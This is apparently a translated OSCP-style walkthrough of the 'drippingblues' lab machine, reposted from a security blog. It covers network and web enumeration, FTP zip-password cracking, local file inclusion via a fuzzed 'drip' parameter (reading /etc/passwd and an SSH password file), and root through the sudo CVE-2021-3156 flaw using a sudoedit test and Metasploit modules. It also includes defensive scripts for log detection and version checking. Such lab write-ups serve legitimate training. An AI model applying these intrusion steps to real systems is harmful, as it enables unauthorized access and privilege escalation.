【OSCP】drippingblues

admin, 2024-09-25 10:56:21

Lab overview

drippingblues

easy

Information gathering, rabbit hole, FTP, zip cracking, ffuf testing, sudo CVE-2021-3156 privilege escalation, msf privilege escalation

Information gathering

Host discovery

nmap -sn 192.168.1.0/24


Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.50
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 20:17 EST
Nmap scan report for 192.168.1.50
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
MAC Address: 08:00:27:D1:A4:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Directory scan

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.50
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/index.php (Status: 200) [Size: 138]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/robots.txt (Status: 200) [Size: 78]
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

The directory scan turned up hint files (robots.txt lists /dripisreal.txt and /etc/dripispowerful.html):


Cracking the zip

Anonymous FTP login reveals a zip file.


After downloading it, crack its password:

zip2john respectmydrip.zip > hashzip
john hashzip --wordlist=/usr/share/wordlists/rockyou.txt


Inside are respectmydrip.txt and secret.zip. secret.zip also needs a password, but cracking it fails.


Getting a foothold

At first I thought the password for secret.zip had to be found on the following page, and that unzipping it would give the SSH password.


Later I visited that page and, not knowing how to collect all the words, looked at someone else's writeup and learned it was a decoy. The real entry point is not here.

https://kerszl.github.io/hacking/walkthrough/drippingblues/


Fuzzing index.php is what revealed the purpose of the hint in the FTP text file: it is a GET parameter name (--fs=138 filters out responses of 138 bytes, the size index.php returns without a usable parameter, as seen in the gobuster output).

ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50/index.php?FUZZ=/etc/passwd --fs=138


Including the following page gave the SSH password:

http://192.168.1.50/index.php?drip=/etc/dripispowerful.html
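On the server side, the ffuf run and the include above leave a clear trail in the Apache access log: requests whose query string carries a traversal sequence or an absolute path. The following script is an added example (not part of the original write-up) that flags such requests; the log lines, the function names flag_lfi_requests and count_lfi_requests, and the field layout (combined log format, request path in field 7) are my assumptions for this example.

```shell
#!/bin/sh
# Added example, not from the original write-up: flag Apache access-log
# requests whose query string looks like a local-file-inclusion probe.
# The log lines below are constructed for this example.

SAMPLE_LOG='192.168.1.129 - - [22/Feb/2024:20:30:01 -0500] "GET /index.php HTTP/1.1" 200 138
192.168.1.129 - - [22/Feb/2024:20:30:02 -0500] "GET /index.php?drip=/etc/passwd HTTP/1.1" 200 2701
192.168.1.129 - - [22/Feb/2024:20:30:03 -0500] "GET /index.php?page=../../../../etc/dripispowerful.html HTTP/1.1" 200 420
192.168.1.129 - - [22/Feb/2024:20:30:04 -0500] "GET /robots.txt HTTP/1.1" 200 78
192.168.1.129 - - [22/Feb/2024:20:30:05 -0500] "GET /index.php?drip=about HTTP/1.1" 200 138'

# Read log lines on stdin; print client, timestamp and path for every request
# whose query string contains "../" or an absolute path ("=/"), after undoing
# the common %2e / %2f encodings that evade a naive literal match.
flag_lfi_requests() {
    awk '{
        path = $7
        q = index(path, "?")
        if (q == 0) next
        query = substr(path, q + 1)
        gsub(/%2[eE]/, ".", query)
        gsub(/%2[fF]/, "/", query)
        if (index(query, "../") > 0 || index(query, "=/") > 0) print $1, $4, path
    }'
}

# Number of flagged requests in a log supplied on stdin.
count_lfi_requests() {
    flag_lfi_requests | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests
```

Two of the five constructed lines are flagged (the /etc/passwd include and the traversal). The real fix is in the application, not the log: an include driven by a request parameter should map the parameter to an allow-list of page names instead of passing it to include().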


With that password I logged in as the thugger user.


Privilege escalation

Uploaded linpeas.sh and ran it, then tried CVE-2021-3156 for privilege escalation.

https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435


sudoedit -s '123123123123'
or
sudoedit -s /

If the response is an error starting with sudoedit: (for example sudoedit: /: not a regular file, or a segfault), the machine is vulnerable. If the response starts with usage:, the machine is not vulnerable or has been patched.
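The sudoedit test above is the reliable check because distribution packages backport the fix without changing the upstream version string. The following script is an added example (not part of the original write-up) for a quick first-pass inventory: it classifies the output of sudo --version against the upstream ranges affected by CVE-2021-3156 (1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1, fixed in 1.9.5p2). The function names and the sample output are my own; the sample assumes an Ubuntu 20.04 host, which ships sudo 1.8.31.

```shell
#!/bin/sh
# Added example, not from the original write-up: classify a sudo version
# string against the upstream ranges affected by CVE-2021-3156.
# "affected" here means "version not known to be fixed upstream"; a distro
# package may carry the fix without bumping this number, so confirm with the
# sudoedit -s / test or the package changelog.

# Turn "1.8.31p2" into one sortable integer:
# major*10^9 + minor*10^6 + patch*10^3 + p-level.
sudo_version_key() {
    ver="$1"
    p=0
    case "$ver" in
        *p*) p="${ver##*p}"; ver="${ver%p*}" ;;
    esac
    major="${ver%%.*}"
    rest="${ver#*.}"
    minor="${rest%%.*}"
    case "$rest" in
        *.*) patch="${rest#*.}" ;;
        *)   patch=0 ;;
    esac
    echo $(( major * 1000000000 + minor * 1000000 + patch * 1000 + p ))
}

# Return 0 (true) when the upstream version lies in an affected range, 1 otherwise.
sudo_version_affected() {
    k=$(sudo_version_key "$1")
    lo8=$(sudo_version_key 1.8.2);  hi8=$(sudo_version_key 1.8.31p2)
    lo9=$(sudo_version_key 1.9.0);  hi9=$(sudo_version_key 1.9.5p1)
    if [ "$k" -ge "$lo8" ] && [ "$k" -le "$hi8" ]; then return 0; fi
    if [ "$k" -ge "$lo9" ] && [ "$k" -le "$hi9" ]; then return 0; fi
    return 1
}

# Parse the "Sudo version X" line of `sudo --version` output and classify it.
# Prints affected:<ver>, not-affected:<ver>, or unknown when no version is found.
classify_sudo_output() {
    v=$(printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9.]*p*[0-9]*\).*/\1/p' | head -n 1)
    [ -n "$v" ] || { echo "unknown"; return; }
    if sudo_version_affected "$v"; then echo "affected:$v"; else echo "not-affected:$v"; fi
}

# Constructed sample: what an Ubuntu 20.04 host like the one in this write-up prints.
SAMPLE_SUDO_OUTPUT='Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31'

classify_sudo_output "$SAMPLE_SUDO_OUTPUT"
```

The sample prints affected:1.8.31. On a patched Ubuntu 20.04 it prints the same, which is exactly why the write-up's sudoedit check, not the version number, decides whether the host is exploitable.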


The following exploit script failed for me here. It was probably not compiled correctly; it has to be compiled on a system of the same version to run successfully.

https://github.com/blasty/CVE-2021-3156

Use the privilege-escalation modules built into msf directly:

post/multi/recon/local_exploit_suggester
exploit/linux/local/sudo_baron_samedit


Addendum

pkexec can likewise be used to escalate directly to root.


End



Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】drippingblues

Posted by admin on 2024-09-25 10:56:21. Source (CN-SEC 中文网): https://cn-sec.com/archives/3206177.html
